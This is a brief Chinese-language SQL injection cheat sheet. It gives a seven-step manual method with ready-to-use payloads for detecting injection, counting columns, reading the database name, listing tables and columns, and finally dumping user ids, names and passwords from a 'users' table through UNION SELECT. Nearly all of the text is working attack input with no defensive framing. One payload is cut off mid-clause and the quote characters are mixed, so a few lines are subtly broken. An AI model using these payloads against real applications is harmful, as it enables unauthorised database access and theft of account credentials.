SQL常用注入语句

手工注入常规思路：
1.判断是否存在注入，注入是字符型还是数字型
2.猜解 SQL 查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.查询到账户的数据

1.判断是否存在注入，注入是字符型还是数字型

1
1' or '1'='1
1’and ‘1’ =’2
1 or 1=1

2.猜解SQL查询语句中的字段数

1′ or 1=1 order by 1 #
1′ or 1=1 order by 2 #
...

3.确定显示的字段顺序

1′ union select 1,2 #

4.获取当前数据库

1′ union select 1,database() #

5.获取数据库中的表

1′ union select 1,group_concat(table_name) from information_schema.tables where table

6.获取表中的字段名

1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

7.下载数据

1′ or 1=1 union select  group_concat(user_id,first_name,last_name),group_concat(password) from users #